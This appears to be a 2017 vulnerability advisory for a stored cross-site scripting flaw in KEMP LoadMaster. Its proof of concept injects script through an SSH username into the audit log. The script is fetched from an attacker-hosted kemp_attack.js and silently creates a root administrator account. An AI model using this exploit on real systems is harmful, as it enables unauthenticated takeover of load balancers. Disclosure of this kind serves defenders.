KEMP LoadMaster 7.135.0.13245 XSS / Code Execution
Posted on 31 May 2017
Vulnerability Summary KEMPas main product, the LoadMaster, is a load balancer built on its own proprietary software platform called LMOS, that enables it to run on almost any platform: As a KEMP LoadMaster appliance, a Virtual LoadMaster (VLM) deployed on HyperAV, VMWare, on bare metal or in the public cloud. KEMP is available in Azure, where it is in the top 15 deployed applications as well as in AWS and VMWare vCloud Air. A cross site scripting web vulnerability has been discovered in KEMP LoadMaster v7.135.0.13245 (latest). A non authenticated user is able to inject his own malicious Javascript code into the system and use it to create a new web administrator user. Vendor response We were unable to get an update beyond this statement from the vendor: Expect a fix in our new version available Jan 2017. Vulnerability Details The issue is located in the System Configuration > System Log Files a View Audit LogFile section. Once administrative access is obtained, the attacker can use it to execute arbitrary code. Proof of Concept (PoC): 1 a Verify, in the victim machine the Audit LogFile (System Configuration > System Log Files): it is empty (Image 2) 2 a Inject simple HTML/JS code in the log page, using the ssh client: from an attacker machine open a shell and type the following code: ssh <button onclick=alert(1)>Click </button>@10.0.8.145 3 a Let the login fail using wrong password (Image 4) 4 a Check again the log page (View Audit LogFile): as you can see the HTML/JS code has been correctly injected (Image 5) Attack script: 1 a Start a web server and host on attack machine the following JS file (kemp_attack.js) //BEGIN//////////////////////////////////////////////////////// openl = function(verb, url, data, target) { var form = document.createElement("form"); form.action = url; form.method = verb; form.target = target || "_self"; if (data) { for (var key in data) { var input = document.createElement("textarea"); input.name = key; input.value = typeof data[key] === "object" ? JSON.stringify(data[key]) : data[key]; form.appendChild(input); } } form.style.display = 'none'; document.body.appendChild(form); form.submit(); }; //modify the target IP (10.0.8.145) and user/pass as necessary openl('POST', 'https://10.0.8.145/progs/useradmin/add', {user:'Peru',pass:'GoSecure!',s:'Add+User'}, 'newWindow'); //modify the target IP as necessary, xuser must be equal to user. Increase the timeout (250) for debug setTimeout(function(){openl('POST', 'https://10.0.8.145/progs/useradmin/setopts', {xuser:'Peru',root:'1'}, 'newWindow');}, 250); //modify the target IP as necessary. The timeout must be greater than the previous setTimeout(function(){openl('', 'https://10.0.8.145/', '', 'newWindow');}, 500); //////////////////////////////////////////////////////////END// 2 a Verify permission of kemp_attack.js (chmod 644 kemp_attack.js) 3 a Verify users currently enabled in Kemp LoadMaster from System Configuration > User Management. As you can se no user (a part from default one) is active in the appliance (Image 8) 4 a Inject the attack code: from the attacker machine open a shell and type the following code: ssh <script src="http://10.0.8.130/kemp\_attack.js"> </script>@10.0.8.145 5 a Check again the log page (View Audit LogFile): this will activate the script 6 a Check again the User Management page: a new user as been created with all permissions.